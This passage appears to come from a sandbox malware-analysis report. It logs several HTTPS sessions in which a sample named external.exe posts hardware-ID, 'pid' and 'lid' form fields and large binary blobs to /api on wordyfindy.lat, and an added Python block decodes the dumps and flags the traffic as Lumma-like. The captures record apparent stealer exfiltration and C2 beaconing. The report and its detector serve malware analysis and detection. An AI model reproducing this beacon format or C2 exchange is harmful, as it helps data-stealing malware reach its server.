                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=7H38HNDLAUCUAG4XRE
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8791
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:18 UTC | 8791 | OUT | Data Raw: 2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c
                                                                                                        Data Ascii (CR/LF restored; the report prints only the start of the 8791-byte body, so the last field is cut off):
                                                                                                        --7H38HNDLAUCUAG4XRE
                                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                                        8F02EEFF079BF58F303C757AA71AA852
                                                                                                        --7H38HNDLAUCUAG4XRE
                                                                                                        Content-Disposition: form-data; name="pid"

                                                                                                        2
                                                                                                        --7H38HNDLAUCUAG4XRE
                                                                                                        Content-Disposition: form-data; name="lid"

                                                                                                        LPnhqo--alael
                                                                                                        2024-12-22 23:12:19 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:19 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=lr0pfrer72c7ilmbric6sq1bpf; expires=Thu, 17 Apr 2025 16:58:58 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VeFMgA7FfW3t78fzn6DPlnZE3tiDH%2BrIQm39vnx6nbp7gUDT9YwHNanSWlvYiprhjzij1qT5mcsHoRXUyu10bL8d3TMztn1nmC4SFCeMJiBdpR769c4ovdeXvHiQVKI6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbc59d3a42f7-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1693&rtt_var=655&sent=6&recv=14&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9728&delivery_rate=1645997&cwnd=171&unsent_bytes=0&cid=b8fb014ac20d9a35&ts=800&x=0"
                                                                                                        2024-12-22 23:12:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii (chunked encoding: chunk size 0xf, then the 15-byte body): f\r\nok 8.46.123.189\r\n
                                                                                                        2024-12-22 23:12:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii (zero-length final chunk): 0\r\n\r\n
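Every session recorded in this section (session 3 above and the ones that follow) has the same shape: a POST to /api on wordyfindy.lat with a multipart/form-data body carrying hwid, pid and lid fields, answered with a chunked body that reads "ok" followed by an IPv4 address. The block below is an added example written for this page; it is not part of the Joe Sandbox report and not a vendor signature. It converts the session-3 hex dumps printed above back into bytes, reassembles the multipart fields, decodes the chunked reply and applies one detection rule distilled from these captures. The "ordinary upload" used as a negative control is constructed; what the three fields denote and whose address the reply carries are not assumed.

```python
"""Decode the session-3 beacon from the report's hex dumps and flag it.
Added example for this page, not code from the report or the sandbox vendor."""
import re
from typing import Dict, Tuple

# Request head and body excerpt exactly as the report prints them for session 3
# (the body dump stops after the start of the 'lid' field).
SESSION3_REQUEST_HEAD = (
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: multipart/form-data; boundary=7H38HNDLAUCUAG4XRE\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 8791\r\n"
    "Host: wordyfindy.lat\r\n"
)
SESSION3_BODY_HEX = (
    "2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d "
    "2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 "
    "37 31 41 41 38 35 32 0d 0a "
    "2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d "
    "2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a "
    "2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d "
    "2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a "
    "4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c"
)
# The two response data chunks the report shows for session 3, concatenated.
SESSION3_RESPONSE_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """'Data Raw' dumps are space-separated hex; bytes.fromhex skips the spaces."""
    return bytes.fromhex(dump)


def parse_request_head(head: str) -> Tuple[str, Dict[str, str]]:
    """Return the request line and a lower-cased header map."""
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def multipart_boundary(content_type: str) -> str:
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("not a multipart Content-Type: " + content_type)
    return m.group(1)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {field name: value}.
    A final part cut off by the dump length (no trailing CRLF) is kept as-is."""
    fields: Dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        head, sep, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', head)   # not filename="..."
        if sep and name:
            if value.endswith(b"\r\n"):
                value = value[:-2]
            fields[name.group(1).decode()] = value
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body such as b'f\\r\\nok ...\\r\\n0\\r\\n\\r\\n'."""
    out = bytearray()
    pos = 0
    while True:
        line_end = raw.index(b"\r\n", pos)
        size = int(raw[pos:line_end].split(b";")[0], 16)  # drop chunk extensions
        if size == 0:
            return bytes(out)
        pos = line_end + 2
        out += raw[pos:pos + size]
        pos += size + 2                                    # skip the chunk's CRLF


BEACON_FIELDS = {"hwid", "pid", "lid"}
OK_REPLY = re.compile(rb"\Aok (\d{1,3}(?:\.\d{1,3}){3})\Z")


def classify_exchange(request_head: str, body: bytes, response_raw: bytes) -> dict:
    """Rule distilled from the captured sessions: POST /api carrying a multipart
    form with hwid/pid/lid, answered by 'ok <ipv4>'. Field meaning is not assumed."""
    request_line, headers = parse_request_head(request_head)
    fields: Dict[str, bytes] = {}
    if headers.get("content-type", "").startswith("multipart/form-data"):
        fields = parse_multipart(body, multipart_boundary(headers["content-type"]))
    reply = OK_REPLY.match(decode_chunked(response_raw))
    verdict = {
        "post_to_api": request_line.startswith("POST /api "),
        "has_beacon_fields": BEACON_FIELDS.issubset(fields),
        "reply_ip": reply.group(1).decode() if reply else None,
        "fields": {k: v.decode("ascii", "replace") for k, v in fields.items()},
    }
    verdict["lumma_like"] = (verdict["post_to_api"] and verdict["has_beacon_fields"]
                             and reply is not None)
    return verdict


# Constructed negative control (not from the report): an ordinary file upload.
BENIGN_HEAD = ("POST /upload HTTP/1.1\r\nHost: example.invalid\r\n"
               "Content-Type: multipart/form-data; boundary=xyz\r\n")
BENIGN_BODY = (b"--xyz\r\nContent-Disposition: form-data; name=\"file\"; filename=\"a.txt\"\r\n"
               b"Content-Type: text/plain\r\n\r\nhello\r\n--xyz--\r\n")
BENIGN_RESPONSE = b"5\r\nsaved\r\n0\r\n\r\n"

if __name__ == "__main__":
    print(classify_exchange(SESSION3_REQUEST_HEAD, hex_dump_to_bytes(SESSION3_BODY_HEX),
                            hex_dump_to_bytes(SESSION3_RESPONSE_HEX)))
```

The parser deliberately tolerates the truncated last part, because the report caps each dump at a few hundred bytes; on a full pcap the same code sees the closing "--boundary--" and stops there. The reply regex anchors on the whole decoded body, so a response that merely contains "ok" somewhere does not match.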


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        4 | 192.168.2.4 | 49738 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-22 23:12:20 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=U0L58UWFFPJHJWO6
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 20432
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:20 UTC | 15331 | OUT | Data Raw: 2d 2d 55 30 4c 35 38 55 57 46 46 50 4a 48 4a 57 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 55 30 4c 35 38 55 57 46 46 50 4a 48 4a 57 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 30 4c 35 38 55 57 46 46 50 4a 48 4a 57 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d
                                                                                                        Data Ascii (CR/LF restored; the dump stops partway through the 'lid' field):
                                                                                                        --U0L58UWFFPJHJWO6
                                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                                        8F02EEFF079BF58F303C757AA71AA852
                                                                                                        --U0L58UWFFPJHJWO6
                                                                                                        Content-Disposition: form-data; name="pid"

                                                                                                        3
                                                                                                        --U0L58UWFFPJHJWO6
                                                                                                        Content-Disposition: form-data; name="lid"

                                                                                                        LPnhqo--alaeljhsfdm
                                                                                                        2024-12-22 23:12:20 UTC5101OUTData Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00
                                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                        2024-12-22 23:12:21 UTC | 1141 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:21 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=lvpn5apa9buaei925qd6fli553; expires=Thu, 17 Apr 2025 16:59:00 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MplL%2Bd3P5cH1AGuK9HEC%2F7eFeJV6KDrMd%2B%2FfcDMKYK9rn%2BgSsWk6cYBU0aJmU9HJy8rR%2BtR8XCsa5k%2B%2F9NfA41pWr6nQuTFX%2F4eQfGNOzhMbWa3UecH8gIlSVL775tUgow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbd369e87cff-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2001&rtt_var=766&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21390&delivery_rate=1413359&cwnd=222&unsent_bytes=0&cid=f96a4b193dd7d51a&ts=981&x=0"
                                                                                                        2024-12-22 23:12:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii (chunked encoding: chunk size 0xf, then the 15-byte body): f\r\nok 8.46.123.189\r\n
                                                                                                        2024-12-22 23:12:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii (zero-length final chunk): 0\r\n\r\n


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        5 | 192.168.2.4 | 49740 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-22 23:12:23 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=NAO7Q2RF23FZTLB
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 1244
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:23 UTC | 1244 | OUT | Data Raw: 2d 2d 4e 41 4f 37 51 32 52 46 32 33 46 5a 54 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 4e 41 4f 37 51 32 52 46 32 33 46 5a 54 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 41 4f 37 51 32 52 46 32 33 46 5a 54 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d 67 0d 0a
                                                                                                        Data Ascii (CR/LF restored; the dump shows only the first part of the 1244-byte body):
                                                                                                        --NAO7Q2RF23FZTLB
                                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                                        8F02EEFF079BF58F303C757AA71AA852
                                                                                                        --NAO7Q2RF23FZTLB
                                                                                                        Content-Disposition: form-data; name="pid"

                                                                                                        1
                                                                                                        --NAO7Q2RF23FZTLB
                                                                                                        Content-Disposition: form-data; name="lid"

                                                                                                        LPnhqo--alaeljhsfdmg
                                                                                                        2024-12-22 23:12:24 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:24 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=ood9halc2plsij1q7gvoanml9p; expires=Thu, 17 Apr 2025 16:59:03 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7pP38f9Z0AjJs%2BNZqOfNFyhFMkqBRxKac2PmkFuKGqtwVZ9fr6H6M3F00NR8C4ZdcdFcNvyIqxbrsqNlCKaM5aANOvB5MGU%2F5A2NZEcv7zYNfI3ZfzccDbdaburNWBu%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbe3cbfec468-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1604&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2156&delivery_rate=1820448&cwnd=235&unsent_bytes=0&cid=2613d620aa42e735&ts=1084&x=0"
                                                                                                        2024-12-22 23:12:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii (chunked encoding: chunk size 0xf, then the 15-byte body): f\r\nok 8.46.123.189\r\n
                                                                                                        2024-12-22 23:12:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii (zero-length final chunk): 0\r\n\r\n


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        6 | 192.168.2.4 | 49742 | 104.21.19.35 | 443 | 7140 | C:\Users\user\Desktop\external.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-22 23:12:26 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=NHUHIGZRFF
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 568452
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:26 UTC | 15331 | OUT | Data Raw: 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d 67 0d 0a 2d 2d 4e 48 55 48 49 47 5a 52 46 46 0d 0a 43
                                                                                                        Data Ascii (CR/LF restored; the dump is cut off at the first byte of the fourth part's header, and the remaining writes below carry the rest of the 568452-byte body):
                                                                                                        --NHUHIGZRFF
                                                                                                        Content-Disposition: form-data; name="hwid"

                                                                                                        8F02EEFF079BF58F303C757AA71AA852
                                                                                                        --NHUHIGZRFF
                                                                                                        Content-Disposition: form-data; name="pid"

                                                                                                        1
                                                                                                        --NHUHIGZRFF
                                                                                                        Content-Disposition: form-data; name="lid"

                                                                                                        LPnhqo--alaeljhsfdmg
                                                                                                        --NHUHIGZRFF
                                                                                                        C
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: d8 7d a6 23 be 02 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c 2a c5 0d fd 46 28 1f 93 e4 73 26 f1 99 d9 69
                                                                                                        Data Ascii: }#Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j*\9-Wi]ORQk-*F(s&i
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 72 61 77 70 12 3e d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 34 a1 5d 4b 6e 50 af a3 c4 af 22 bd 6f 25 04
                                                                                                        Data Ascii: rawp>K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F4]KnP"o%
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: e2 65 4d 26 12 87 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb 9d 50 43 e6 e7 5c 22 14 34 2d 65 fb 72 3c 9c
                                                                                                        Data Ascii: eM&oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?PC\"4-er<
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: b8 cc 97 5f 7a 20 c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 17 ef ff ad a2 f8 ff be 20 38 1b 09 8f 04 70
